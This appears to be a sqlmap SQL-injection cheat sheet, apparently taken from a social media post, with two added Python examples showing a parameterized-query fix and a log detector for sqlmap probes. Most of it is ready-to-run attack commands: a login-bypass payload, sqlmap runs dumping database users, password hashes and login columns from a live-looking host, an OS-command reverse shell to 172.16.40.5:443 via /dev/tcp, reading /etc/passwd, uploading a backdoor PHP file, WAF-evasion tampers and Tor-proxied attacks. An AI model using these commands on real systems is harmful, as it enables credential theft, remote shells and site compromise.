Fuzzing SQLi Login Bypass:
https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth Bypass.txt
User: ' or 1=1 limit 1 -- -+ Pass: ' or 1=1 limit 1 -- -+
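The reason the payload above logs in is that the application builds its login query by string concatenation. The following is an added example, not code from the page: a minimal in-memory SQLite table (constructed) with the concatenated query next to its parameterized replacement, so the bypass and its fix can be observed side by side.

```python
import sqlite3

# Constructed in-memory user table for the demonstration (not from the page).
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE usuario (id INTEGER PRIMARY KEY, login TEXT, clave TEXT)")
CONN.execute("INSERT INTO usuario (login, clave) VALUES ('admin', 's3cret')")
CONN.commit()

BYPASS = "' or 1=1 limit 1 -- -+"   # the auth-bypass payload quoted above


def login_vulnerable(user: str, password: str):
    """Builds the WHERE clause by concatenation. The quote in the payload closes
    the literal, 'or 1=1' makes the predicate always true and '-- ' comments out
    the password check, so the first row of the table is returned."""
    sql = f"SELECT id, login FROM usuario WHERE login='{user}' AND clave='{password}'"
    return CONN.execute(sql).fetchone()


def login_parameterized(user: str, password: str):
    """Same query with bound parameters: the payload is compared as a plain
    string against the login column and never reaches the SQL parser."""
    sql = "SELECT id, login FROM usuario WHERE login=? AND clave=?"
    return CONN.execute(sql, (user, password)).fetchone()


if __name__ == "__main__":
    print("concatenated query :", login_vulnerable(BYPASS, BYPASS))       # (1, 'admin')
    print("parameterized query:", login_parameterized(BYPASS, BYPASS))    # None
    print("valid credentials  :", login_parameterized("admin", "s3cret"))  # (1, 'admin')
```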
Perform a SQLi POST injection with sqlmap
Copy the HTTP/S request of the vulnerable login from Burp Suite (saved here as sql.txt)
sqlmap -r sql.txt --random-agent --dbs
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --dbs
List the database currently used by the application.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --current-db
List the users of the DBMS
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --users
List the password hashes of the MySQL users
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --passwords
List the privileges of the MySQL users
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --privileges
List the tables of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema --tables
List the columns of the usuario table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario --columns
Dump the cargo, email, login and clave columns of the usuario table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario -C cargo,email,login,clave --dump
Identify the database directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-db
Identify the user who connects to the instance directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-user
List the users in the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --users
List user privileges on the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --privileges
Obtain a reverse shell (We must have write permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-shell
Execute operating system commands through the SQLi (here a reverse shell back to 172.16.40.5:443).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-cmd "bash -c 'exec bash -i &>/dev/tcp/172.16.40.5/443 <&1'"
Read OS files (requires the FILE/read privilege); sqlmap stores the downloaded copy under its output directory.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-read='/etc/passwd'
cat /root/.local/share/sqlmap/output/192.168.100.6/files/_etc_passwd
Upload a local file to the operating system through the SQLi (requires file write privileges).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-write='/root/backdor.php' --file-dest='/var/www/html/xvwa/config1.php'
Injection with prefix identification.
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --code=200 --prefix="" --no-cast
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --code=200 --prefix="" --no-cast --time-sec=2 -D testdb -T flag6 -C Content --dump
Injection with union identification
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique=U --union-cols=1-20
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique=U --union-cols=1-20 -D testdb -T flag7 -C Content --dump
Anti-CSRF Token Bypass Injection
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&token=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="token" --random-agent --skip-waf
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&token=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="token" --cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent -D testdb -T flag8 -C Content --dump
Single-use value bypass injection (the uid parameter must change on every request, so sqlmap randomizes it)
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --batch -v 5 | grep URI
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --batch -v 5 --random-agent --dbs
Injection bypassing filtering of the characters '<' and '>' (the between tamper rewrites comparisons with NOT BETWEEN)
sqlmap -u 'http://167.172.52.160:31918/case11.php?id=1' --tamper=between --level=3 --risk=3 --no-cast --dbms=mysql --dbs
sqlmap 'http://178.128.42.126:30292/action.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://178.128.42.126:30292' -H 'Connection: keep-alive' -H 'Referer: http://178.128.42.126:30292/shop.html' -H 'Cookie: sort=0a' --data-raw '{"id":1}' --dbms="mysql" --level=3 --risk=2 --no-cast --tamper=between --time-sec=2 -D production -T final_flag -C content --dump
WAF Evasion
View the installed tamper scripts
ls /usr/share/sqlmap/tamper
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' --random-agent --timeout=3 --threads=10 --dbms=mysql --level=5 --risk=3 -v 3 --no-cast --dbs --tamper='htmlencode'
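From the defender's side, the tamper scripts above (between, charencode, htmlencode) and --random-agent are exactly what a naive signature on the raw request line or the User-Agent misses. The following is an added example, not from the page: a small access-log classifier over constructed log lines that URL-decodes to a fixed point, HTML-unescapes and only then matches sqlmap-style probes, so the encoded variants are still flagged.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page). Line 2 is a plain
# boolean probe with the default sqlmap User-Agent, line 3 uses the between
# tamper, line 4 is double URL-encoded (charencode), line 5 is HTML-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xvwa/vulnerabilities/sqli/?search=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /xvwa/vulnerabilities/sqli/?search=7%20AND%201234%3D1234 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /case11.php?id=1%20AND%205%20NOT%20BETWEEN%200%20AND%204 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /case7.php?id=1%2520UNION%2520ALL%2520SELECT%25201%252C2 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=%26%2339%3B%20OR%20SLEEP(5)--%20 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /shop.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')

SIGNATURES = {
    "boolean-probe": re.compile(r"\bAND\s+\d+\s*=\s*\d+"),       # AND 1234=1234
    "union-select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b"),
    "time-based": re.compile(r"\bSLEEP\s*\("),
    "between-tamper": re.compile(r"\bNOT\s+BETWEEN\b"),         # between.py rewrite of '='
}


def normalize(s: str) -> str:
    """URL-decode until nothing changes (defeats repeated percent-encoding),
    then resolve HTML entities (htmlencode tamper) and upper-case for matching."""
    prev = None
    while prev != s:
        prev, s = s, unquote(s)
    return html.unescape(s).upper()


def classify(line: str):
    """Return (client_ip, [hit names]) for a parsable log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = ["sqlmap-user-agent"] if "sqlmap" in m.group("ua").lower() else []
    decoded = normalize(m.group("req"))
    hits += [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return m.group(1), hits


def scan(log_text: str):
    """All lines with at least one hit, in log order."""
    return [r for r in map(classify, log_text.splitlines()) if r and r[1]]


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The User-Agent check alone would catch only the second line; every other hit depends on decoding before matching.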
Search for a column by name across all databases
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --random-agent --timeout=3 --threads=10 --dbms=mysql --level=5 --risk=3 -v 3 --hex -C nombre --search
Extract a range of records (by row number) from a column
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --level=2 --risk=1 --no-cast -p 'continente' --string="KM" --dbms="Oracle" --time-sec=1 --tamper="between,charencode" --random-agent -D IDODB -T ACT_VERIFICACION --pivot-column=PRE_NOMBRES -C PRE_NOMBRES_E --start=1 --stop=10 --dump
Identify parameters through crawling (multiple --answers are given comma-separated in a single option)
sqlmap -u http://testphp.vulnweb.com/ --crawl=10 --level=1 --risk=1 --answers="do you want to test this URL=Y,Do you want to skip further tests involving it?=N" --threads 10 --batch
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --answers="already=N"
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --answers="follow=Y"
Identify parameters of multiple endpoints (one URL per line in the file)
sqlmap -m urls.txt --batch --level=3 --risk=2 --dbms=mysql --answers="already=N"
sqlmap -m sql.txt --batch --level=3 --risk=2 --dbms=mysql --answers="already=N" --method POST --data="id=1" --cookie="PHPSESSID=msk54snle4a8dfca774mhrih13" --dbs
Pentesting an onion (Tor hidden service) target for SQLi
sudo apt install tor && sudo apt install proxychains
Check that Tor is listening (expected: 127.0.0.1:9150)
netstat -apn | grep "tor"
proxychains4 nmap -sT -PN -n -p- 2uw3iwonlklvl5bftdqwebg7n4v62yq3nrpbczry2flmpghpajc45xqd.onion
sqlmap -r web.txt --dbms='mysql' --random-agent --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level=2 --risk=2 --dbs
source: https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid0TcGonUD2GEjFeHJkCizW3XPcW6V1saJKbnpFv4n3EgtzD9GQ7PH6j9iHv5TDDrtvl%26id%3D100094147517045